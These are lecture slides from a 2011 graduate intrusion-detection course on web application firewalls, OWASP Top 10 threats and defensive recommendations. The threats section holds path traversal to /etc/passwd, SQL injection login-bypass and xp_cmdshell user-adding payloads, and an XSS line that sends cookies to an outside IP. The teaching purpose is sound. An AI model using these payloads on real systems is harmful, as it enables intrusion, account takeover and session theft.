You also want an ePaper? Increase the reach of your titles
YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.
Chapter 7. Web Application Firewall<br />
IMS784(침입탐지시스템)<br />
Spring, 2011<br />
Prof. H. K. Kim<br />
1
Agenda<br />
• I. Remind for term project<br />
• II. Web security threats<br />
• III. Web application Firewall<br />
• IV. Practical recommendations<br />
2
Remind – term project<br />
Selected dataset - 1999 DARPA Intrusion detection data set<br />
http://www.ll.mit.edu/mission/communications/ist/corpora/id/data/1999data.<br />
html<br />
http://www.ll.mit.edu/mission/communications/ist/corpora/ideval/index.html<br />
notes)<br />
Writing in Korean is allowed without any penalty.<br />
Make a group with 2~3 students<br />
Your term paper must include <strong>the</strong>se following items.<br />
(1) analyze 1999 DARPA data set first, and explain about <strong>the</strong> dataset. If you<br />
have any criticism regarding dataset itself or experiment design, <strong>the</strong>n<br />
describe it.<br />
- You will <strong>get</strong> no point in case that you just write several sentence or small<br />
paragraph for criticism.<br />
3
Notice – term project<br />
(2) Select <strong>the</strong> papers (more than 3 papers) related <strong>to</strong> <strong>the</strong>se experiments.<br />
- <strong>the</strong> newer paper, <strong>the</strong> better.<br />
- describe why you select <strong>the</strong>se papers. (a lot of citation count interesting for<br />
what)<br />
(3) Give your criticism about those papers.<br />
- You will <strong>get</strong> no point in case that you just write several sentences (<strong>to</strong>o short!)<br />
or small paragraph for criticism.<br />
(4) You have <strong>to</strong> develop your own algorithm/methodology <strong>to</strong> improve <strong>the</strong><br />
previous research.<br />
- describe your experiment design<br />
- submit your code in case that you develop an application for your experiment<br />
- describe your research's contributions strictly and justify your contributions.<br />
(5) adopting attack graph or data mining technique or statistics <strong>to</strong>ols... any idea<br />
will be welcomed.<br />
You have <strong>to</strong> submit peer assessment result by contribution for your term paper.<br />
(when your group's members are student A, B and C.<br />
A: 55 point, B: 25 point, C: 20 point)<br />
due date: 16th June<br />
4
Agenda<br />
• I. Notice for term project<br />
• II. Web security threats<br />
• III. Web application Firewall<br />
• IV. Practical recommendations<br />
5
Web application (1/2)<br />
▣ definition <br />
• A web application is a software application that is accessible using a<br />
web browser or HTTP(S) user agent.<br />
6
Web application (2/2)<br />
▣ web application‟s architecture<br />
n-tiers<br />
HTTP request<br />
(cleartext or SSL)<br />
SQL<br />
Database<br />
Web<br />
Client<br />
Transport<br />
Web<br />
Server<br />
Web app<br />
Web app<br />
Web app<br />
Web app<br />
Connec<strong>to</strong>r<br />
Connec<strong>to</strong>r<br />
DB<br />
DB<br />
HTTP reply (HTML,<br />
Javascript,<br />
VBscript, etc)<br />
Apache, IIS,<br />
Netscape<br />
etc…<br />
Perl,<br />
C/C++,<br />
JSP, etc..<br />
ADO, ODBC, etc..<br />
7
Why is web security important<br />
Application Layer<br />
Database Layer<br />
Your security “perimeter” has huge<br />
holes at <strong>the</strong> application layer<br />
HTTP<br />
request<br />
(cleartext or<br />
SSL)<br />
Cus<strong>to</strong>m Developed<br />
Application Code<br />
Databases<br />
OS/Platform layer<br />
Network Layer<br />
HTTP reply<br />
(HTML, Javascript,<br />
VBscript, etc)<br />
Firewall<br />
•Windows<br />
•Unix<br />
App Server<br />
Web Server<br />
Hardened OS<br />
•Apache<br />
•IIS…<br />
Firewall<br />
Database<br />
connection:<br />
•ADO,<br />
•JDBC, etc.<br />
We can‟t protect and detect application layer‟s attack with <strong>the</strong> traditional safeguard of<br />
network layer and OS layer (Firewall, ACL, OS hardening, SSL)<br />
image source: www.owasp.org<br />
8
Why is web security important<br />
Network and OS layer protection cannot<br />
block web attacks.<br />
A lot of vulnerabilities are newly<br />
discovered every month in <strong>the</strong> well-known<br />
web applications.<br />
(e.g. Tomcat, Apache, zero board and etc.)<br />
The only thing that a firewall and ACL<br />
can do is „blocking or permitting‟.<br />
It is extremely hard <strong>to</strong> defend against<br />
zero-day attacks.<br />
It is hard <strong>to</strong> find and fix vulnerabilities in<br />
in-house web applications.<br />
With <strong>the</strong>se vulnerabilities, hackers can<br />
<strong>get</strong> inside of <strong>the</strong> network and servers.<br />
The most valuable assets (e.g. cus<strong>to</strong>mers‟<br />
personal information) can be exposed by<br />
web attacks.<br />
It is hard <strong>to</strong> apply database encryption<br />
methods due <strong>to</strong> performance<br />
degradation.<br />
The Importance of Web Security<br />
keeps growing<br />
9
Why is web security important<br />
“Now is <strong>the</strong> time for security at Application Level”, Dec. 2005, Gartner<br />
10
Is it easy <strong>to</strong> hack in<strong>to</strong> web<br />
GET / HTTP/1.1<br />
Host: www.google.com<br />
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5)<br />
Gecko/2008120122 Firefox/3.0.5 (.NET CLR 3.5.30729)<br />
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />
Accept-Language: en-us,en;q=0.5<br />
Accept-Encoding: gzip,deflate<br />
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7<br />
Keep-Alive: 300<br />
Proxy-Connection: keep-alive<br />
Cookie:<br />
NID=19=LWH0mZNAX517tLm1zQBdKc55MBOkXjxTfHcxEdwH9NTJaWLgYfGglP2Ji16h45r76aDJcqrKl<br />
uXxr_X zJETi1Zm45jVw_mQ1RiZp8dFji1SOigJ-HulNC9MBpOSG_RVO;<br />
PREF=ID=3caba30d3a03f500:TM=1232592795:LM=1232592795:S=b3Yz2CoeVFRPz-fm<br />
11
• Web crack<br />
Useful web hacking <strong>to</strong>ols<br />
– For password brute force attack<br />
• IntelliTemper, webzip<br />
– For ga<strong>the</strong>ring direc<strong>to</strong>ry scheme and <strong>file</strong>s<br />
12
Basic web hacking technique<br />
• Direc<strong>to</strong>ry traversal and <strong>file</strong> download<br />
– You got some URL path and <strong>the</strong> web server‟s OS type is linux<br />
system<br />
• http://www.victim.com/board/down.jsp<strong>file</strong>name=upload.hwp<br />
– try this for downloading a sensitive <strong>file</strong><br />
• http://www.victim.com/board/down.jsp<strong>file</strong>name=../../../../../../../../../../<br />
../etc/passwd<br />
– Try direc<strong>to</strong>ry listing<br />
13
OWASP <strong>to</strong>p 10<br />
• OWASP <strong>to</strong>p 10 project<br />
– http://www.owasp.org/index.php/OWASP_To<br />
p_Ten_Project<br />
• Open Web Application Security Project<br />
– Promotes secure software development<br />
– Oriented <strong>to</strong> <strong>the</strong> delivery of web oriented<br />
services<br />
– Focused primarily on <strong>the</strong> “back-end” than<br />
web-design issues<br />
– An open forum for discussion<br />
14
OWASP <strong>to</strong>p 10<br />
• OWASP <strong>to</strong>p 10 project<br />
– http://www.owasp.org/index.php/OWASP_Top_Ten_P<br />
roject<br />
– 번역본:<br />
http://www.securityplus.or.kr/xe/module=<strong>file</strong>&act=<br />
procFileDownload&<strong>file</strong>_srl=25999&sid=00866c962d<br />
596769cb97cd9fadb81947<br />
• Open Web Application Security Project<br />
– Promotes secure software development<br />
– Oriented <strong>to</strong> <strong>the</strong> delivery of web oriented services<br />
– Focused primarily on <strong>the</strong> “back-end” than webdesign<br />
issues<br />
– An open forum for discussion<br />
15
OWASP <strong>to</strong>p 10<br />
• <strong>to</strong>p 10 issue (~2009)<br />
– A1. Unvalidated Input<br />
– A2. Broken Access Controls<br />
– A3. Broken Au<strong>the</strong>ntication and Session Management<br />
– A4. Cross Site Scripting Flaws<br />
– A5. Buffer Overflows<br />
– A6. Injection Flaws<br />
– A7. Improper Error Handling<br />
– A8. Insecure S<strong>to</strong>rage<br />
– A9. Denial of Service<br />
– A10. Insecure Configuration Management<br />
16
What‟s new in OWASP Top 10 (2010)<br />
=<br />
=<br />
+<br />
+<br />
-<br />
-<br />
Ref: OWASP Top 10 project - 2010 http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project<br />
17
OWASP Top 10 (2010)<br />
18
OWASP Top 10 (2010)<br />
19
Injection – SQL injection illustrated<br />
Application Layer<br />
Database Layer<br />
OS/Platform layer<br />
Network Layer<br />
HTTP<br />
request<br />
APPLICATION<br />
ATTACK<br />
<br />
Firewall<br />
Accounts<br />
Finance<br />
Administration<br />
Transactions<br />
Communication<br />
Knowledge Mgmt<br />
Cus<strong>to</strong>m Code<br />
App Server<br />
Web Server<br />
Hardened OS<br />
E-Commerce<br />
HTTP<br />
SQL<br />
response<br />
query<br />
<br />
<br />
<br />
Bus. Functions<br />
Firewall<br />
Databases<br />
Legacy Systems<br />
Web Services<br />
Direc<strong>to</strong>ries<br />
Human Resources<br />
DB Table<br />
<br />
<br />
Billing<br />
"SELECT * FROM<br />
Account Summary<br />
Account: accounts WHERE<br />
acct=‘’ SKU: OR 1=1--<br />
’"<br />
Acct:5424-6066-2134-4334<br />
Acct:4128-7574-3921-0192<br />
Acct:5424-9383-2039-4029<br />
Acct:4128-0004-1234-0293<br />
1. Application presents a form <strong>to</strong><br />
<strong>the</strong> attacker<br />
2. Attacker sends an attack in <strong>the</strong><br />
form data<br />
3. Application forwards attack <strong>to</strong><br />
<strong>the</strong> database in a SQL query<br />
4. Database runs query containing<br />
attack and sends encrypted results<br />
back <strong>to</strong> application<br />
5. Application decrypts data as<br />
normal and sends results <strong>to</strong> <strong>the</strong> user<br />
image source: www.owasp.org<br />
20
More SQL injection examples<br />
Query = "SELECT user_id FROM member<br />
WHERE user_id = ' "&strUser_id&" '<br />
AND password = ' '&strPassword&" ' “<br />
strAuthCheck = GetQueryResult(Query)<br />
If strAuthCheck = " " <strong>the</strong>n<br />
boolAu<strong>the</strong>nticated = Fasle<br />
Else<br />
boolAu<strong>the</strong>nticated = True<br />
EndIf<br />
Query = "SELECT user_id FROM member<br />
WHERE user_id = „„ or „‟=„„<br />
AND password = ' „ or „‟=„ „ “<br />
strAuthCheck = GetQueryResult(Query)<br />
If strAuthCheck = " " <strong>the</strong>n<br />
boolAu<strong>the</strong>nticated = Fasle<br />
Else<br />
boolAu<strong>the</strong>nticated = True<br />
EndIf<br />
Then try <strong>to</strong> inject <strong>the</strong>se<br />
Id : ‘ or ‘’=‘<br />
password : ‘ or ‘’=‘<br />
21
More SQL injection examples<br />
More dangerous injection code:<br />
''%'; EXEC master.dbo.xp_cmdshell "net user<br />
sqltest sqltest /add"--%„<br />
22
Injection – how <strong>to</strong> defend<br />
1. Use a safe API which avoids <strong>the</strong> use of <strong>the</strong> interpreter entirely or provides a<br />
parameterized interface. (e.g. s<strong>to</strong>red procedures) – even though <strong>the</strong>se APIs are<br />
parameterized, but may still allow injection.<br />
2. If a parameterized API is not available, you should carefully filter special characters<br />
using <strong>the</strong> specific escape syntax.<br />
Example of filtering code for user input validation<br />
<br />
String queryinput = request.<strong>get</strong>Parameter(“DB_INPUT”);<br />
String newqueryinput;<br />
static Pattern escaper = Pattern.compile("([^a-zA-z0-9.])");<br />
newqueryinput = escaper.matcher(queryinput).replaceAll("\\\\$1");<br />
23
XSS – XSS illustrated<br />
1. Attacker sets <strong>the</strong> trap – post <strong>the</strong> JavaScript code<br />
Application with<br />
s<strong>to</strong>red XSS code<br />
Attacker<br />
2. Victim views page – sees attacker‟s posting<br />
Script runs inside<br />
victim‟s browser with full<br />
access <strong>to</strong> <strong>the</strong> DOM and<br />
cookies<br />
Accounts<br />
Finance<br />
Administration<br />
Transactions<br />
Cus<strong>to</strong>m Code<br />
Communication<br />
Knowledge Mgmt<br />
E-Commerce<br />
Bus. Functions<br />
victim<br />
3. usually, <strong>the</strong> script are designed <strong>to</strong> send victim‟s session or cookie <strong>to</strong> hacker<br />
silently. With victim‟s session ID or cookie, hacker can login <strong>to</strong> <strong>the</strong> web site<br />
without an victim‟s ID and password.<br />
image source: www.owasp.org<br />
24
More XSS example<br />
• url="http://143.248.3.1/GetCookie.aspcookie="+docume<br />
nt.cookie;window.open(url,width=0, height=0);<br />
25
More XSS example<br />
• With s<strong>to</strong>len cookie, how <strong>to</strong> exploit<br />
• You can use Burp suite or Paros for editing HTTP request field.<br />
Replace cookie field with captured victim‟s value<br />
26
XSS – how <strong>to</strong> defend<br />
1.Filter all untrusted data based on <strong>the</strong> HTML context (body, attribute, JavaScript, CSS,<br />
or URL) that <strong>the</strong> data will be placed in<strong>to</strong>. Do not allow users’ HTML tag or script input.<br />
2.If an web application requires users’ input of special characters <strong>the</strong>n apply positive or<br />
“whitelist” input validation.<br />
Example code for filtering user inputs<br />
27
1. Unvalidated Parameters<br />
• HTTP requests from browsers <strong>to</strong> web apps<br />
– URL, Querystring, Form Fields, Hidden Fields, Cookies, Headers<br />
– Web apps use this information <strong>to</strong> generate web pages<br />
• Attackers can modify anything in request<br />
– WebScarab<br />
• Key Points:<br />
– Check before you use anything in HTTP request<br />
– Canonicalize before you check<br />
– Client-side validation is irrelevant<br />
– Reject anything not specifically allowed<br />
• Type, min/max length, character set, regex, min/max value…<br />
28
2. Broken Access Control<br />
• Access control is how you keep one user away from<br />
o<strong>the</strong>r users‟ information<br />
• The problem is that many environments provide<br />
au<strong>the</strong>ntication, but don‟t handle access control well<br />
– Many sites have a complex access control policy<br />
– Insidiously difficult <strong>to</strong> implement correctly<br />
• Key Points<br />
– Write down your access control policy<br />
– Don‟t use any “id‟s” that an attacker can manipulate<br />
– Implement access control in a centralized module<br />
29
3. Broken Account and Session Management<br />
• Account Management<br />
– Handling credentials across client-server gap<br />
– Backend au<strong>the</strong>ntication credentials <strong>to</strong>o<br />
• Session Management<br />
– HTTP is a “stateless” pro<strong>to</strong>col. Web apps need <strong>to</strong> keep track<br />
of which request came from which user<br />
– “Brand” sessions with an id using cookie, hidden field, URL<br />
tag, etc…<br />
• Key Points<br />
– Keep credentials secret at all times<br />
– Use only <strong>the</strong> random sessionid provided by your environment<br />
30
3. Broken Account and Session Management<br />
• With exploiting MS SQL reporting service web<br />
vulnerability, it is able <strong>to</strong> do direc<strong>to</strong>ry traversal and<br />
download sensitive data<br />
31
4. Cross-Site Scripting (XSS) Flaws<br />
• Web browsers execute code sent from websites<br />
– Javascript<br />
– Flash and many o<strong>the</strong>rs haven‟t really been explored<br />
• But what if an attacker could <strong>get</strong> a website <strong>to</strong> forward<br />
an attack!<br />
– S<strong>to</strong>red – web application s<strong>to</strong>res content from user, <strong>the</strong>n sends<br />
it <strong>to</strong> o<strong>the</strong>r users<br />
– Reflected – web application doesn‟t s<strong>to</strong>re attack, just sends it<br />
back <strong>to</strong> whoever sent <strong>the</strong> request<br />
• Key Points<br />
– Don‟t try <strong>to</strong> strip out active content – <strong>to</strong>o many variations.<br />
Use a “positive” specification.<br />
32
5. Buffer Overflows<br />
• Web applications read all types of input from users<br />
– Libraries, DLL‟s, Server code, Cus<strong>to</strong>m code, Exec<br />
• C and C++ code is vulnerable <strong>to</strong> buffer overflows<br />
– Input overflows end of buffer and overwrites <strong>the</strong> stack<br />
– Can be used <strong>to</strong> execute arbitrary code<br />
• Key Points<br />
– Be careful about reading in<strong>to</strong> buffers<br />
– Use safe string libraries correctly<br />
33
6. Command Injection Flaws<br />
• Web applications involve many interpreters<br />
– OS calls, SQL databases, templating systems<br />
• Malicious code<br />
– Sent in HTTP request<br />
– Extracted by web application<br />
– Passed <strong>to</strong> interpreter, executed on behalf of web app<br />
• Key Points<br />
– Use extreme care when invoking an interpreter<br />
– Use limited interfaces where possible (PreparedStatement)<br />
– Check return values<br />
34
7. Error Handling Problems<br />
• Errors occur in web applications all <strong>the</strong> time<br />
– Out of memory, <strong>to</strong>o many users, timeout, db failure<br />
– Au<strong>the</strong>ntication failure, access control failure, bad input<br />
• How do you respond<br />
– Need <strong>to</strong> tell user what happened (no hacking clues)<br />
– Need <strong>to</strong> log an appropriate (different) message<br />
• Key Points:<br />
– Make sure error screens don‟t print stack traces<br />
– Design your error handling scheme<br />
– Configure your server<br />
35
7. Error Handling Problems<br />
36
8. Insecure Use of Cryp<strong>to</strong>graphy<br />
• Use cryp<strong>to</strong>graphy <strong>to</strong> s<strong>to</strong>re sensitive information<br />
– Algorithms are simple <strong>to</strong> use, integrating <strong>the</strong>m is hard<br />
• Key Points<br />
– Do not even think about inventing a new algorithm<br />
– Be extremely careful s<strong>to</strong>ring keys, certs, and passwords<br />
– Rethink whe<strong>the</strong>r you need <strong>to</strong> s<strong>to</strong>re <strong>the</strong> information<br />
– Don‟t s<strong>to</strong>re user passwords – use a hash like SHA-256 or md5<br />
• The “master secret” can be split in<strong>to</strong> two locations and<br />
assembled<br />
– Configuration <strong>file</strong>s, external servers, within <strong>the</strong> code<br />
37
9. Remote Administration Flaws<br />
• Many sites allow remote administration<br />
– Very powerful, often hidden interfaces<br />
– Difficult <strong>to</strong> protect<br />
• Key Points<br />
– Eliminate all administration over <strong>the</strong> Internet<br />
– Separate <strong>the</strong> admin application from <strong>the</strong> main app<br />
– Limit <strong>the</strong> scope of remote administration<br />
• Consider strong au<strong>the</strong>ntication<br />
– Smart card or <strong>to</strong>ken<br />
39
10. Web and Application Server Misconfiguration<br />
• All web and application servers have many securityrelevant<br />
configuration options<br />
– Default accounts and passwords<br />
– Unnecessary default, backup, sample apps, libraries<br />
– Overly informative error messages<br />
– Misconfigured SSL, default certificates, self-signed certs<br />
– Unused administrative services<br />
• Key Points:<br />
– Keep up with patches (Code Red, Slammer)<br />
– Use Scanning Tools (Nik<strong>to</strong>, Nessus)<br />
– Harden your servers!<br />
40
Agenda<br />
• I. Notice for term project<br />
• II. Web security threats<br />
• III. Web application Firewall<br />
• IV. Practical recommendations<br />
41
Web Application Firewall<br />
• Why do we need WAF We already have IPS.<br />
– IPS covers all of <strong>the</strong> network pro<strong>to</strong>col and<br />
application flaws.<br />
– WAF is highly designed for detecting and<br />
preventing HTTP<br />
– If you use both, WAF will save IPS‟ workload for<br />
detecting HTTP side attack<br />
• WAF has unique functionality based on white<br />
and black<br />
– It enumerates all http requests including parameters<br />
on that sites and maintains.<br />
– It blocks well-known attacks for http servers<br />
(apache, IIS and etc.) and attack patterns in OWASP<br />
<strong>to</strong>p 10 categories<br />
42
Web Application Firewall<br />
• WAF is a valuable security solution<br />
because Web applications are <strong>to</strong>o<br />
sophisticated for an IDS/Intrusion<br />
Prevention System (IPS) <strong>to</strong> protect.<br />
• Each Web application is unique makes it<br />
<strong>to</strong>o complex for a static patternmatching<br />
solution.<br />
• A WAF has <strong>the</strong> capability <strong>to</strong> understand<br />
what characters are allowed within <strong>the</strong><br />
context of <strong>the</strong> many pieces and parts of<br />
a Web page.<br />
43
WAF Protection models<br />
• WAF‟s modeled approaches <strong>to</strong> filtering<br />
traffic<br />
– user permission-based access control<br />
– centralized au<strong>the</strong>ntication<br />
– negative security<br />
– positive security<br />
– virtual patching<br />
– output filtering<br />
44
WAF – positive filtering model<br />
• allows only “known good” traffic <strong>to</strong> pass<br />
– Some allow, all deny<br />
– a WAF running a positive security approach<br />
is like a paranoid security guard who<br />
au<strong>to</strong>matically assumes that everyone he<br />
doesn‟t recognize is malicious.<br />
– With this model, WAF catches <strong>the</strong> unknown<br />
(or zero-day) attacks<br />
– it does not need <strong>to</strong> regularly have its<br />
signature <strong>file</strong> updated.<br />
– It requires extensive training or learning<br />
time, which takes much up-front time and<br />
energy<br />
45
WAF – negative filtering model<br />
• block known bad items<br />
– Some deny, all allow<br />
– moni<strong>to</strong>r and detect known problems<br />
– easy <strong>to</strong> develop, false positives are<br />
uncommon<br />
– negative security model does not detect<br />
unknown threats<br />
46
WAF – virtual patching model<br />
• Network level defense<br />
• Even though <strong>the</strong>re are security holes in <strong>the</strong> back-end<br />
servers, WAF can defend <strong>the</strong>m from <strong>the</strong> relative attack.<br />
– This concept allows an IDS/IPS administra<strong>to</strong>r <strong>to</strong> install a<br />
cus<strong>to</strong>m filter <strong>to</strong> prevent an unpatched system<br />
– virtual patching requires an administra<strong>to</strong>r <strong>to</strong> have <strong>the</strong> exploit<br />
code <strong>to</strong> properly test <strong>the</strong> solution, or <strong>the</strong> patch has <strong>to</strong> be<br />
generic<br />
• E.g. block all packets which have <strong>the</strong> following strings<br />
– DECLARE%20@S%20NVARCHAR(4000)<br />
– It is part of one particular SQL injection attack payload<br />
– All various attacks with this strings will be blocked<br />
47
WAF - Output Detection Model/Content Scrubbing<br />
• WAF is still weak from <strong>the</strong> evasion technique<br />
– SQL injection attacks typically involve an apostrophe, which<br />
can be encoded in <strong>the</strong> attack request several different ways:<br />
so WAF possibly misses some attacks<br />
– „, %27, Char(39), ' , ' , \\„ , '<br />
• But dealing with return messages are relatively easy.<br />
e.g. DataLayerAPI error '80040e14' Unclosed<br />
quotation mark after <strong>the</strong> character string ''<br />
• While output detection is configured <strong>to</strong> detect some<br />
specific error messages, it prevents <strong>the</strong> error message<br />
from returning <strong>to</strong> <strong>the</strong> attacker.<br />
– It can rewrite <strong>the</strong> response <strong>to</strong> make it look like <strong>the</strong> error never<br />
happened<br />
– It can redirect return pages <strong>to</strong> <strong>the</strong> pre-defined page<br />
48
WAF policy models<br />
• Learning<br />
– For ga<strong>the</strong>ring reliable source of obtaining a rule set<br />
• by placing <strong>the</strong> WAF in a secure environment and letting<br />
<strong>the</strong> software moni<strong>to</strong>r create a database of what constitutes<br />
acceptable behavior.<br />
• WAF can learn by watching trusted activity from a trusted<br />
source.<br />
• Vulnerability assessment feedback<br />
• Learning is not good enough<br />
• Ga<strong>the</strong>r information for WAF configuration by vulnerability<br />
assessment (VA) with an au<strong>to</strong>mated <strong>to</strong>ol, professional<br />
service, or manual assessment.<br />
• Manual entry<br />
– Enumerate and subscribe all of <strong>the</strong> allowable<br />
subdirec<strong>to</strong>ry, subdomain, <strong>file</strong> type, or any number<br />
of o<strong>the</strong>r <strong>file</strong>s, folders, or situations<br />
49
VA+WAF<br />
• Some commercial WAF products have an<br />
integration module or interface with VA<br />
<strong>to</strong>ol<br />
• Efficient than manual entry<br />
50
Limitation<br />
• WAF is focused on web based attacks<br />
• Use WAF and IDPS both<br />
• WAF has still false-positive and false-negative<br />
problems<br />
• Performance degradation – deadly bottleneck<br />
• Lots of maintenance cost<br />
– Misconfiguration issue<br />
– Hard <strong>to</strong> handle frequent web site updates and<br />
renewals<br />
• WAF itself does not fix source code itself.<br />
– Secure coding is highly required<br />
51
Commercial WAF<br />
• art of defence - hyperguard<br />
• Trustwave - WebDefend Web Application Firewall<br />
• Deny All - rWeb<br />
• Fortify Software - Defender<br />
• Imperva - SecureSphere<br />
• Applicure - DotDefender<br />
• Radware AppWall<br />
• Armorlogic - Profense<br />
• Barracuda Networks - Application Firewall<br />
• Bee-Ware - iSentry<br />
• BinarySec - Application Firewall<br />
• BugSec - WebSniper<br />
• Cisco - ACE Web Application Firewall<br />
• Citrix - Application Firewall<br />
• eEye Digital Security - SecureIIS<br />
• F5 - Application Security Manager<br />
• Forum Systems - Xwall, Sentry<br />
• mWEbscurity - webApp.secure<br />
• Phion / Visonys - Airlock<br />
• Privacyware - ThreatSentry IIS Web Application Firewall<br />
• Protegrity - Defiance TMS - Web Application Firewall<br />
• Xtradyne - Application Firewalls<br />
52
• Modsecurity<br />
Open source based WAF<br />
– http://www.modsecurity.org<br />
• Guardian<br />
– http://guardian.jumperz.net/index.html<br />
• Web knight<br />
– http://www.aqtronix.com/PageID=99<br />
53
Agenda<br />
• I. Notice for term project<br />
• II. Web security threats<br />
• III. Web application Firewall<br />
• IV. Practical recommendations<br />
54
Web Application Firewall<br />
Deploy IPS and a web<br />
application firewall in<br />
front of web servers<br />
Performance degradation<br />
Limits in bud<strong>get</strong><br />
False-positives<br />
Review all source codes of<br />
web applications before <strong>the</strong><br />
codes go in<strong>to</strong> service<br />
Frequent updates and<br />
renewals of web sites<br />
Lack of security experts<br />
Patch all known security<br />
flaws<br />
Every month <strong>the</strong>re are more<br />
new vulnerabilities<br />
discovered<br />
Establish standards<br />
No standards<br />
Legacy systems<br />
developed with various<br />
languages<br />
55
More practical recommendations<br />
• Separate database that handles continuous user input (e.g. web BBS) from<br />
o<strong>the</strong>r databases.<br />
• Implement 3-tier architecture or middleware for sanitizing transactions.<br />
• Developing dll or dummy TCP server will be enough.<br />
• Use replicated databases - even though hacker attacks succeed, <strong>the</strong> original<br />
data will be always safe and secure.<br />
Do not allow direct DB connection<br />
Web server<br />
Use user defined service<br />
port for middleware service<br />
Middle<br />
component<br />
server<br />
Parse query request and send <strong>the</strong> query<br />
only if <strong>the</strong> pre-defined condition is matched<br />
(source IP = web server, who = sa2, query = SELECT only)<br />
replicated<br />
Database<br />
DB connection is only allowed<br />
from <strong>the</strong> middleware component<br />
server<br />
Original<br />
Database<br />
56
More practical recommendations – no perfection<br />
• Use secondary au<strong>the</strong>ntication for protecting users<br />
• WAF is not enough, IPS+WAF is not enough also.<br />
57
More practical recommendations<br />
• Make a contingency plan.<br />
- Web applications can be compromised at any time.<br />
– Even if we fail <strong>to</strong> protect and detect attacks, we must not fail <strong>to</strong> react.<br />
(e.g. Solaris’ zone copy for res<strong>to</strong>ring)<br />
– Even though <strong>the</strong> web application is compromised, <strong>the</strong> damage should<br />
not be propagated <strong>to</strong> <strong>the</strong> o<strong>the</strong>r processes or servers.<br />
• Use virtualization technology for minimizing damages. (e.g.<br />
Solaris OS’ Zone, VMware, MS virtual server)<br />
Application virtualization<br />
process<br />
process<br />
OS virtualization<br />
VM1<br />
VM2<br />
Real machine<br />
hacking<br />
Damaged area<br />
58
Homework<br />
• Web Application Firewall Evaluation Criteria<br />
•https://<strong>file</strong>s.pbworks.com/download/ZQDhMrjby0/webappsec/132470<br />
61/wasc-wafec-v1.0.pdf<br />
• 1) make a group with 2~3 students.<br />
• 2) Read <strong>the</strong> above WAFEC thoroughly and evaluate any free version of<br />
WAF with <strong>the</strong> Evaluation Criteria.<br />
• 3) submit your report <strong>to</strong> EKU.<br />
59
References<br />
• http://www.owasp.org/index.php/File:OWASP_Top_Ten.ppt<br />
• http://projects.webappsec.org/Web-Application-Security-Scanner-<br />
Evaluation-Criteria<br />
• http://www.modsecurity.org/documentation/ApacheCon_Europe_2008-<br />
Web_Intrusion_Detection_with_ModSecurity.pdf<br />
• http://en.wikipedia.org/wiki/Application_firewall<br />
• http://guardian.jumperz.net/index.html<br />
• http://webappsec.org/<br />
• http://www.owasp.org/index.php/Web_Application_Firewall<br />
60